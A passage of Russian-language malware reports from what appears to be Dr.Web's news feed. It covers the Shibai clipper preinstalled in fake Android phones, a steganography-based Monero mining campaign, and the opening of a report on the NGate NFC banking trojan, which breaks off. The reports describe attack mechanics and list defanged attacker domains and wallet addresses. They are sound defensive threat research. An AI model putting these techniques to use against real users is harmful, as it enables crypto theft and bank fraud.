&lt;p&gt;С июня 2024 года в вирусную лабораторию «Доктор Веб» начали поступать сообщения от наших клиентов, которые установили антивирус Dr.Web Security Space на свежеприобретенные телефоны с ОС Android. При сканировании системного раздела прошивки было выявлено подозрительное приложение, замаскированное под мессенджер WhatsApp (принадлежит компании Meta, признанной экстремистской организацией и запрещенной в РФ). В ходе исследования, проведенного нашими аналитиками, было установлено, что эти случаи — не единичные: они свидетельствуют о мошеннической цепочке в рамках кампании по краже криптовалют методом клиппинга.&lt;/p&gt;

&lt;blockquote&gt;Клиппинг — это кража информации путем перехвата и/или подмены данных, которые пользователь копирует в буфер обмена. Наиболее часто клипперы нацелены на поиск в буфере обмена последовательностей символов, соответствующих адресам криптокошельков. В среднем такие строки содержат от 25 до 42 символов. Для удобства работы с такими данными пользователи обычно используют стандартные операции «копировать» и «вставить». Клиппер может воспользоваться этим, перехватив содержимое буфера обмена и незаметно подменив все адреса криптовалютных кошельков на те, которые принадлежат киберпреступникам.&lt;/blockquote&gt;

&lt;p&gt;Использование мессенджеров, троянизированных клипперами для кражи финансовой информации, не является новой тактикой для хакеров. Одна из подобных кампаний была выявлена еще в 2023 году. Тогда группа злоумышленников использовала ряд легитимных площадок, таких как Youtube, для распространения ссылок на вредоносные приложения Telegram и WhatsApp. Ссылки размещались в описаниях к видео. Основной целевой аудиторией были китайские пользователи, которые не имеют доступа к иностранным мессенджерам. А поскольку для обхода блокировок они используют ряд ухищрений, в частности скачивание программ с неофициальных сайтов, то такая кампания получила довольно внушительный размах.&lt;/p&gt;

&lt;p&gt;Теперь злоумышленники смогли выйти на новый уровень и получить доступ к цепочке поставок ряда китайских производителей смартфонов на базе ОС Android. Именно про такие смартфоны и поступили сообщения в вирусную лабораторию «Доктор Веб». Мошеннические приложения были обнаружены непосредственно в составе предустановленного на телефоне ПО: вредоносный код был добавлен к мессенджеру WhatsApp.&lt;/p&gt;

&lt;p&gt;Отметим, что в большинстве случаев скомпрометированные устройства были представлены в нижнем ценовом диапазоне и имели названия, созвучные с моделями известных брендов: S23 Ultra, Note 13 Pro, P70 Ultra и так далее. При этом их технические характеристики были далеки от заявленных. Дело в том, что в состав прошивки входило скрытое приложение, позволяющее с легкостью изменить всю отображаемую техническую информацию об устройстве не только в системном меню, но и в отчетах таких популярных приложений, как AIDA64 и CPU-Z. Кроме того, несмотря на то, что в разделе «Об устройстве» было заявлено об установленной последней версии Android 14, на самом деле все устройства работали под управлением одного и того же билда Android 12. Треть указанных ниже моделей выпускается под брендом SHOWJI. Производителей остальных моделей нам идентифицировать не удалось.&lt;/p&gt;

&lt;div class="ScrollX"&gt;
  &lt;table class="Table"&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI S19 Pro&lt;/td&gt;
      &lt;td&gt;Note 30i&lt;/td&gt;
      &lt;td&gt;Camon 20&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI Note 13 Pro&lt;/td&gt;
      &lt;td&gt;S23 Ultra&lt;/td&gt;
      &lt;td&gt;P70 Ultra&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI X100S Pro&lt;/td&gt;
      &lt;td&gt;S18 Pro&lt;/td&gt;
      &lt;td&gt;M14 Ultra&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;SHOWJI Reno12 Pro&lt;/td&gt;
      &lt;td&gt;6 Pro&lt;/td&gt;
      &lt;td&gt;S24 Ultra&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/table&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Модели смартфонов со встроенным вредоносным ПО, приобретенные нашими пользователями&lt;/em&gt;&lt;/p&gt;

&lt;div class="flex fxCenter"&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic1.png" class="preview"&gt;
       &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic1.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic2.png" class="preview"&gt;
       &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic2.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
&lt;/div&gt;
&lt;div class="flex fxCenter"&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic3.png" class="preview"&gt;
       &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic3.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic4.png" class="preview"&gt;
       &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic4.1.png" alt="phone" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Изображения из карточек товаров&lt;/em&gt;&lt;/p&gt;

&lt;div class="flex fxCenter"&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic5.png" class="preview"&gt;
       &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic5.2.png" alt="virus app" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
   &lt;div class="margRM"&gt;
     &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic6.png" class="preview"&gt;
       &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic6.2.png" alt="virus app" style="max-width: 350px;"&gt;
     &lt;/a&gt;
   &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Скриншот программы для подделывания технических характеристик и результат ее работы&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;Более достоверные результаты при изучении технических характеристик предоставляет приложение DevCheck. В большинстве случаев оно точно определяет параметры устройства, даже если производитель пытается ввести потребителя в заблуждение.&lt;/blockquote&gt;

&lt;p&gt;Троянизированное приложение WhatsApp было создано с помощью инструмента &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt;. Этот фреймворк позволяет изменять поведение основного приложения, не вмешиваясь в его код, а загружать для этого дополнительные программные модули. В данном случае мошенники разместили в папке &lt;span class="string"&gt;assets&lt;/span&gt; вредоносный модуль &lt;span class="string"&gt;com.whatsHook.apk&lt;/span&gt;, выполняющий следующие функции.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Перехват обновления приложения. Теперь вместо проверки обновлений по адресу &lt;span class="string"&gt;hxxps://www.whatsapp[.]com/android/current/WhatsApp[.]apk&lt;/span&gt; происходит обращение к одному из серверов злоумышленников, например, &lt;span class="string"&gt;hххps://apk-download[.]pro/download/whatsapp[.]apk&lt;/span&gt;. Это позволяет сохранять троянизированность приложения и вносить в его работу необходимые мошенникам изменения.&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic7.png" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic7.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Метод, перехватывающий обращения к легитимному адресу обновлений&lt;/em&gt;&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic8.png" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic8.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Класс, который передает поддельный адрес обновлений&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Поиск строк в принимаемых и отправляемых сообщениях, соответствующих шаблонам адресов кошельков для криптовалют Tron (строка из 34 символов, начинается с T) и Ethereum (строка из 42 символов, начинается с 0x) и их подмена на адреса злоумышленников. Такая базовая функциональность клиппера была расширена, и теперь факт подмены адреса криптокошелька не виден жертве. В случае исходящего сообщения на скомпрометированном устройстве жертве демонстрируется корректный адрес ее собственного кошелька, а получателю сообщения отправляется адрес кошелька мошенников. При получении же входящего сообщения в чате собеседнику виден адрес отправленного им кошелька, а на устройстве жертвы входящий адрес подменяется на адрес кошелька хакеров. Адреса кошельков мошенников меняются при каждой итерации кампании, но в троян вшиты и резервные адреса ("TN7pfenJ1ePpjoPFaeu46pxjT9rhYDqW66", "0x673dB7Ed16A13Aa137d39401a085892D5e1f0fCA"), которые могут использоваться, если по каким-то причинам связь с С2-сервером не может быть установлена. Дополнительно троян отправляет на сервер злоумышленников все сообщения, отправляемые в мессенджере.&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic9.png" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic9.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Парсер, выполняющий поиск адресов кошельков Tron&lt;/em&gt;&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic10.png" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic10.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Парсер, выполняющий поиск адресов кошельков Ethereum&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Поиск и отправка на сервер злоумышленников всех изображений в форматах jpg, png и jpeg в следующих папках:&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="ScrollX"&gt;
  &lt;table class="Table"&gt;
    &lt;tr&gt;
      &lt;td&gt;DCIM&lt;/td&gt;
      &lt;td&gt;DOWNLOADS&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;PICTURES&lt;/td&gt;
      &lt;td&gt;DOCUMENTS&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
      &lt;td&gt;ALARMS&lt;/td&gt;
      &lt;td&gt;SCREENSHOTS&lt;/td&gt;
    &lt;/tr&gt;
  &lt;/table&gt;
&lt;/div&gt;

&lt;p&gt;Это делается для поиска так называемых мнемонических фраз для криптокошельков, представляющих собой набор из 12–24 слов в определенной последовательности. Такая фраза демонстрируется однократно при создании кошелька и многие пользователи просто делают ее скриншот, а не записывают на отдельный носитель. Такие фразы позволяют восстановить доступ к кошельку, если пользователь забыл пароль. Для злоумышленников получение таких данных означает возможность сразу же вывести все деньги с криптокошелька.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic11.png" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic11.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Пример мнемонической фразы для восстановления доступа к криптокошельку. Слова необходимо вводить в соответствии с нумерацией&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Отправляет информацию об устройстве: производитель, модель, языковые настройки и имя троянизированного приложения.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;В вирусной базе Dr.Web этот троян получил отдельное название Shibai из-за строки &lt;span class="string"&gt;Log.e("", "-------------------SHIBAI-释放------------")&lt;/span&gt;, содержащейся в его коде. Можно предположить, что это является отсылкой к названию одной из криптомонет.&lt;/p&gt;

&lt;p&gt;Следует отметить, что данная кампания является очень масштабной. Аналогичным образом мошенники модифицировали порядка 40 приложений. Среди них — уже упомянутые нами WhatsApp и Telegram, а также другие мессенджеры, сканеры QR-кодов и т. д. Но в основном вмешательству подверглись популярные приложения криптокошельков (Mathwallet, Trust Wallet и другие). Всего было обнаружено более 60 С2-серверов, а для распространения вредоносных приложений задействованы порядка 30 доменов. Также нам удалось получить некоторые сведения о финансовых успехах троянописателей. На одном из отслеживаемых нами кошельков были замечены поступления за два года в размере более миллиона долларов. На другом нашлось ещё полмиллиона. Остальные кошельки (примерно 20 штук) хранили суммы до 100 тысяч долларов. Полную картину о доходности этой кампании получить невозможно, так как адреса кошельков получаются с сервера злоумышленников и каждый раз могут быть разными.&lt;/p&gt;


&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic12.png" class="preview"&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/april/shibai/pic12.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Один из наиболее доходных кошельков злоумышленников&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для защиты от подобных атак вирусные аналитики «Доктор Веб» рекомендуют установить антивирус Dr.Web Security Space для мобильных устройств, не приобретать смартфоны с характеристиками, явно несоответствующими своей цене, скачивать приложения только из доверенных источников, таких как Google Play, Rustore и AppGallery, а также не хранить скриншоты с мнемоническими фразами, паролями и ключами на устройстве в незашифрованном виде.&lt;/p&gt;

&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Tool.LSPatch.1&amp;lng=kk"&gt;&lt;b&gt;Tool.LSPatch.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/SHIBAI_campaign/Readme.adoc"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;
</description></item><item><guid>https://news.drweb.kz/show/?i=14976&amp;lng=kk</guid><title>Доктор, откуда у вас такие картинки? Использование стеганографии при добыче криптовалюты</title><link>https://news.drweb.kz/show/?i=14976&amp;lng=kk&amp;c=23</link><pubDate>Fri, 24 Jan 2025 17:17:16 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;24 января 2025 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;В ходе анализа данных телеметрии специалисты вирусной лаборатории «Доктор Веб» выявили образцы вредоносного ПО, которые при ближайшем рассмотрении оказались компонентами активной кампании по майнингу криптовалюты Monero. Эта кампания примечательна тем, что реализована в виде ряда вредоносных цепочек, две из которых построены на запуске скриптов, извлекающих вредоносную нагрузку из файлов изображений в формате BMP.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Начало кампании было положено, вероятно, в 2022 году, когда был обнаружен исполняемый файл &lt;span class="string"&gt;Services.exe&lt;/span&gt;, являющийся .NET-приложением, запускающим сценарий VBscript. Этот сценарий реализует функции бэкдора, связываясь с сервером злоумышленников и выполняя скрипты и файлы, присланные в ответ. Так, на компьютер жертвы скачивался вредоносный файл &lt;span class="string"&gt;ubr.txt&lt;/span&gt;, являвшийся скриптом для интерпретатора PowerShell, у которого было изменено расширение с ps1 на txt.&lt;/p&gt;
&lt;p&gt;Скрипт &lt;span class="string"&gt;ubr.txt&lt;/span&gt; проверяет наличие майнеров, которые могли быть уже установлены на скомпрометированной машине, и заменяет их на необходимые злоумышленникам версии. Устанавливаемые скриптом файлы представляют собой майнер SilentCryptoMiner и его настройки, с помощью которого хакеры добывали криптовалюту Monero.&lt;/p&gt;
&lt;p&gt;Мы уже &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.kz/show/?i=14920"&gt;неоднократно писали&lt;/a&gt; об использовании &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.kz/show/?i=14792&amp;lng=ru&amp;c=23"&gt;этого майнера&lt;/a&gt; злоумышленниками, для которых привлекательна его простота конфигурации, расширенные возможности по добыче различных типов криптовалют и маскировке от диагностических утилит, а также поддержка удаленного управления всеми майнерами в ботнете посредством веб-панели.&lt;/p&gt;

&lt;p&gt;В рамках этой кампании файлы майнера маскируются под различное ПО, в частности для проведения видеозвонков в Zoom (&lt;span class="string"&gt;ZoomE.exe&lt;/span&gt; и &lt;span class="string"&gt;ZoomX.exe&lt;/span&gt;) или службы Windows (&lt;span class="string"&gt;Service32.exe&lt;/span&gt; и &lt;span class="string"&gt;Service64.exe&lt;/span&gt;) и т. д. Несмотря на то, что существует несколько наборов вредоносных файлов, имеющих разные имена, все они выполняют одинаковые задачи — удаление других майнеров, установка нового майнера и доставка обновлений для него.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;PowerShell-скрипт &lt;span class="string"&gt;ubr.txt&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Дополнительно майнер обращается к домену getcert[.]net, на котором расположен файл &lt;span class="string"&gt;m.txt&lt;/span&gt; с настройками добычи криптовалюты. Этот ресурс также задействован и в других цепочках.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Файл &lt;span class="string"&gt;m.txt&lt;/span&gt;, содержащий настройки майнера&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В дальнейшем мошенники видоизменили методологию атаки, сделав её значительно более интересной и подключив средства стеганографии.&lt;/p&gt;

&lt;blockquote&gt;
    Стеганография — метод сокрытия одной информации внутри другой. В отличие от криптографии, когда зашифрованные данные могут привлечь внимание, стеганография позволяет незаметно скрыть информацию, например, в изображении. Многие эксперты по кибербезопасности полагают, что популярность использования стеганографии для обхода средств защиты будет набирать обороты.
&lt;/blockquote&gt;

&lt;div class="fx -part_2 fxItemsCenter"&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;

&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Изображение слева (автор исходного фото: &lt;a target="_blank" rel="noopener noreferrer" href="https://unsplash.com/@marekpiwnicki"&gt;Marek Piwnicki&lt;/a&gt;) содержит в себе скрытое изображение с логотипом компании «Доктор Веб»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Вторая, более новая, цепочка реализована посредством трояна Amadey, который запускает PowerShell-скрипт &lt;span class="string"&gt;Async.ps1&lt;/span&gt;, скачивающий изображения в формате BMP с легитимного хостинга изображений imghippo.com. С помощью стеганографических алгоритмов из изображений извлекаются два исполняемых файла: стилер &lt;a href="https://vms.drweb.kz/search/?q=Trojan.PackedNET.2429&amp;lng=kk"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt; и полезная нагрузка, которая:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;
            отключает запрос UAC на повышение прав для администраторов,
    &lt;/li&gt;
    &lt;li&gt;
        вносит множество исключений во встроенный антивирус Windows Defender,
    &lt;/li&gt;
    &lt;li&gt;отключает уведомления в Windows,&lt;/li&gt;
    &lt;li&gt;создает новую задачу по пути &lt;span class="string"&gt;\Microsoft\Windows\WindowsBackup\&lt;/span&gt; с именем 'User'.&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Содержимое скрипта &lt;span class="string"&gt;Async1.ps&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В ходе выполнения задачи происходит обращение к доменам злоумышленников, в записи DNS TXT которых содержится адрес хранения последующей полезной нагрузки. После ее скачивания происходит распаковка архива с изображениями в формате BMP и запуск следующих файлов:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;
&lt;p&gt;
        &lt;span class="string"&gt;Cleaner.txt&lt;/span&gt; — PowerShell-скрипт, удаляющий любые другие майнеры,
   &lt;/p&gt;
 &lt;/li&gt;
    &lt;li&gt;
&lt;p&gt;
        &lt;span class="string"&gt;m.txt&lt;/span&gt; — PowerShell-скрипт, извлекающий полезную нагрузку из изображений m.bmp и IV.bmp. Нагрузка внутри изображений является майнером SilentCryptoMiner и запускающим его инжектором,
&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
&lt;p&gt;
        &lt;span class="string"&gt;Net.txt&lt;/span&gt; — скрипт, который читает запись DNS TXT у доменов windowscdn[.]site и buyclients[.]xyz. В этой записи находится ссылка на полезную нагрузку, ведущая на сервис raw.githack[.]com.
   &lt;/p&gt;
 &lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
    Запись DNS TXT представляет собой расширение стандартной записи DNS и содержит текст, который в легитимных целях используется для верификации домена. Тем не менее, владелец домена может внести туда произвольные данные — например, как в данном случае, ссылку на полезную нагрузку.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Содержимое архива с вредоносными изображениями&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Модули майнера постоянно развиваются. В последнее время авторы перешли к использованию легитимных ресурсов для размещения вредоносных изображений и платформу GitHub для хранения полезной нагрузки. Кроме того, были найдены модули, проверяющие факт запуска в песочницах и на виртуальных машинах.&lt;/p&gt;
&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Модуль, проверяющий имена запущенных приложений на соответствие названиям популярных инструментов, используемых исследователями кибербезопасности&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Один из кошельков, указанный в настройках майнера, был создан в мае 2022 года, и к сегодняшнему дню на него было перечислено 340 XMR. Однако курс данной криптовалюты переживает период существенной волатильности, так что прибыль мошенников может составлять от 6 до 7,5 миллионов рублей. Судя по волнообразности хешрейта, что свидетельствует о регулярном включении и выключении компьютеров, в данной майнинговой кампании участвуют в основном рядовые пользователи, находящиеся в одной группе часовых поясов. В среднем хешрейт составляет 3,3 млн хешей в секунду, что позволяет скомпрометированным машинам приносить злоумышленникам по 1 XMR в 40 часов.&lt;/p&gt;
&lt;p&gt;Эта кампания — лишь верхушка айсберга в мире киберугроз, построенных на средствах стеганографии, и она подчеркивает, насколько важно быть бдительными в цифровом пространстве. Рекомендации компании «Доктор Веб» остаются неизменными: устанавливайте программное обеспечение только из надёжных источников, не открывайте подозрительные ссылки и не отключайте антивирусную защиту при скачивании файлов из интернета.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_ru.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_ru_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Схема атаки&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/get_cert%20campaign"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a target="_blank" rel="noopener noreferrer" href="https://vms.drweb.kz/virus/?i=25898223"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=PowerShell.Starter.98&amp;lng=kk"&gt;&lt;b&gt;PowerShell.Starter.98&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=PowerShell.DownLoader.1640&amp;lng=kk"&gt;&lt;b&gt;PowerShell.DownLoader.1640&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=Trojan.PackedNET.2429&amp;lng=kk"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее о &lt;a href="https://vms.drweb.kz/search/?q=VBS.DownLoader.2822&amp;lng=kk"&gt;&lt;b&gt;VBS.DownLoader.2822&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14969&amp;lng=kk</guid><title>Бесконтактный банкинг за себя (и того парня): схема с кражей денег при помощи NFC добралась и до российских пользователей</title><link>https://news.drweb.kz/show/?i=14969&amp;lng=kk&amp;c=23</link><pubDate>Thu, 26 Dec 2024 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;26 декабря 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Вирусные аналитики «Доктор Веб» предупреждают о появлении новых версий банковского трояна NGate, нацеленных на российских пользователей. Этот троян передает данные с NFC-чипа скомпрометированного устройства, позволяя злоумышленнику снимать деньги со счетов жертвы в банкоматах без какого-либо участия с её стороны.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Банкер NGate впервые попал на радары антивирусных вендоров еще осенью 2023 года, когда в профильных СМИ стали появляться сообщения об атаках на клиентов крупных чешских банков. Стратегия злоумышленников строилась на комбинации социальной инженерии, фишинга и использования вредоносного ПО. Эти стандартные тактики воплотились в довольно новаторский сценарий: результатом взаимодействия с жертвой становился удаленный доступ к NFC-возможностям её платежного средства. Данная кампания была пресечена органами охраны правопорядка Чехии, однако её идея была адаптирована для российских реалий и реализована для незаконного обогащения за счет пользователей в России.&lt;/p&gt;

&lt;p&gt;Событием, запускающее цепочку компрометации, предположительно является звонок от мошенников, которые сообщают о возможности получить различные социальные выплаты или иную финансовую выгоду. Для этого жертве необходимо проследовать по присланной ссылке на мошеннический сайт, откуда скачивается вредоносный APK с трояном NGate, замаскированный под приложение портала Госуслуг, Банка России, или одного из других популярных банков.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/0.png" class="preview"&gt;
    &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/0.png" alt="danger_apps_icons"&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Иконки вредоносных приложений, стилизованные под официальные&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Банковский троян NGate представляет собой вредоносную модификацию приложения с открытым исходным кодом NFCGate, которое было разработано для отладки протоколов передачи NFC-данных. NFCGate поддерживает ряд функций, однако для злоумышленников наибольший интерес представляют возможность захвата NFC-трафика приложений и передачи его на удаленное устройство, которым может выступать или сервер, или непосредственно смартфон злоумышленников. Преступники модифицировали исходный код, добавив к нему интерфейсы с айдентикой финансовых организаций, и включили режим ретрансляции NFC-данных. Кроме того, в состав приложения включена библиотека &lt;span class="string"&gt;nfc-card-reader&lt;/span&gt;, которая позволяет хакерам удаленно получить также номер карты и срок ее действия.&lt;/p&gt;

&lt;p&gt;После запуска приложения жертве, якобы для верификации себя в качестве клиента, предлагается приложить платежную карту к задней стороне смартфона, ввести свой PIN-код и подождать, пока псевдоприложение распознает карту. В это время происходит считывание данных с банковской карты и передача их преступникам. Обратим внимание на то, что для кражи NFC-данных атакуемый смартфон не требует root-доступа.&lt;/p&gt;

